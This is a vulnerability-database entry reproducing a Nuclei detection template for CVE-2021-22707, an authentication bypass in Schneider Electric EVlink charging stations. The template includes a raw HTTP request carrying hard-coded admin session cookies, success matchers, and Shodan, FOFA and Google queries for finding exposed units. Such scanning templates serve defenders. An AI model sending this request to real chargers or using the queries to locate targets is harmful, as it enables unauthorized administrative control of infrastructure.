Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2021-22707
HistoryAug 10, 2023 - 6:30 a.m.

EVlink City < R8 V3.4.0.1 - Authentication Bypass

2023-08-1006:30:57
ProjectDiscovery
github.com
2
cve-2021-22707
evlink
authentication bypass
schneider electric
use of hard-coded credentials

9.5 High

AI Score

Confidence

High

0.4 Low

EPSS

Percentile

97.3%

JSON
A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.

id: CVE-2021-22707

info:
  name: EVlink City < R8 V3.4.0.1 - Authentication Bypass
  author: ritikchaddha,dorkerdevil
  severity: critical
  description: |
    A CWE-798: Use of Hard-coded Credentials vulnerability exists in EVlink City (EVC1S22P4 / EVC1S7P4 all versions prior to R8 V3.4.0.1), EVlink Parking (EVW2 / EVF2 / EV.2 all versions prior to R8 V3.4.0.1), and EVlink Smart Wallbox (EVB1A all versions prior to R8 V3.4.0.1 ) that could allow an attacker to issue unauthorized commands to the charging station web server with administrative privileges.
  remediation: |
    Upgrade to EVlink City R8 V3.4.0.1 or later to fix the authentication bypass vulnerability.
  reference:
    - https://codeberg.org/AmenoCat/CVE-2021-22707-PoC/raw/branch/main/exploit.sh
    - https://nvd.nist.gov/vuln/detail/CVE-2021-22707
    - http://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2021-194-06
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-22707
    cwe-id: CWE-798
    epss-score: 0.39995
    epss-percentile: 0.97263
    cpe: cpe:2.3:o:schneider-electric:evlink_city_evc1s22p4_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: schneider-electric
    product: evlink_city_evc1s22p4_firmware
    shodan-query: title:"EVSE web interface"
    fofa-query: title="EVSE web interface"
    google-query: intitle:"evse web interface"
  tags: cve2021,cve,evlink,auth-bypass,schneider-electric

http:
  - raw:
      - |
        GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Cookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin

    host-redirects: true
    max-redirects: 2

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '?worker=Cluster" name="cluster" id="id_cluster'

      - type: status
        status:
          - 200
# digest: 490a0046304402201dd62e40407144bfef7ec5c935ad7d0dbf6f7da3ab40ea8b5defb014c9292100022052c5c81fa72fdb0e69598dda215e657d24019497cffebb3dbad0988db0588af5:922c64590222798bb761d5b6d8e72950

Related

cve 1
attackerkb 1
prion 1
cvelist 1
threatpost 1
packetstorm 1
zdt 1
cve
cve
CVE-2021-22707
2021-07-21 15:15:00
attackerkb
attackerkb
CVE-2021-22707
2021-07-21 00:00:00
prion
prion
Hardcoded credentials
2021-07-21 15:15:00
cvelist
cvelist
CVE-2021-22707
2021-07-21 10:41:47
threatpost
threatpost
Unpatched, Critical RCE Bug Allows Utility Takeovers
2021-07-13 20:04:17
packetstorm
packetstorm
Schneider Electric EVlink Charging Stations Authentication Bypass / Code Execution
2021-07-14 00:00:00
zdt
zdt
Schneider Electric EVlink Charging Stations Authentication Bypass / Code Execution Vulnerabilities
2021-07-16 00:00:00

9.5 High

AI Score

Confidence

High

0.4 Low

EPSS

Percentile

97.3%

JSON
Related for NUCLEI:CVE-2021-22707
cve1attackerkb1prion1cvelist1threatpost1packetstorm1zdt1